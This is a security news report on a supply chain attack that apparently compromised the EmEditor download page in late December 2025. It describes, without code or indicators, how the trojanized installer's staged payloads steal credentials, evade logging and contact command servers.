A new watering hole attack is actively targeting developers who use EmEditor, a popular text editor widely adopted within Japanese programming communities. In late December 2025, the official EmEditor download page was compromised, allowing threat actors to distribute malicious versions of the software installer to unsuspecting users. This incident highlights a significant supply chain risk, where trusted software platforms can be subverted to deliver sophisticated malware designed for credential theft and data exfiltration.
The attack, detected by Trend Micro analysts, involved a trojanized installer that, once executed, deploys a multistage malware payload. The threat actors strategically timed the campaign to coincide with the year-end holidays, a period when IT security teams often operate with reduced staffing, potentially increasing the likelihood of the initial compromise going unnoticed for an extended period. Developers and organizations worldwide relying on EmEditor faced an immediate and significant risk during the undetected window.
Infection Mechanism and Stealer Malware Deployment
The compromised .MSI installer file contained modified scripts that were designed to execute without triggering immediate security alerts. Upon installation, the malicious code initiates a PowerShell command. This command reaches out to remote servers, disguised with domains mimicking legitimate EmEditor infrastructure, to retrieve the first-stage malware payload.
Trend Micro’s analysis revealed that the initial payload then downloads two further components from additional URLs. These subsequent payloads are responsible for establishing persistence on the infected system, conducting system reconnaissance, and initiating data theft operations. The attackers employed sophisticated obfuscation techniques throughout the malware’s code to evade detection by standard security solutions.
Payloads and Evasion Tactics
The second payload identified by researchers functions as a primary anti-detection mechanism. It actively works to disable PowerShell Event Tracing for Windows (ETW), a logging feature crucial for security monitoring, thereby hindering threat hunting efforts. Additionally, this payload accesses the Windows Credential Manager to extract stored user credentials, such as passwords, which are invaluable to attackers seeking to gain further access.
To facilitate deeper network intrusion and lateral movement, the malware also captures screenshots of the infected system, providing attackers with visual context of the user’s activity. The third payload manages the command-and-control (C2) communications with the attacker’s infrastructure. This payload includes geofencing capabilities, excluding specific countries from its targeted attacks, which researchers suggest may indicate Russian or Commonwealth of Independent States (CIS) involvement.
A consistent campaign identifier has been observed across all communications associated with this malware. This identifier aids security researchers in tracking affected systems and coordinating industry-wide response efforts. The technical details of this supply chain attack underscore the persistent threat posed by sophisticated malware targeting developers and their essential tools.
The disclosure of this compromise by EmEditor, including an advisory posted on their webpage, marks a critical step in mitigating further infections. However, affected users who may have downloaded the malicious installer before its discovery are at risk. Organizations should remain vigilant and ensure their security protocols are robust enough to detect and respond to such advanced persistent threats.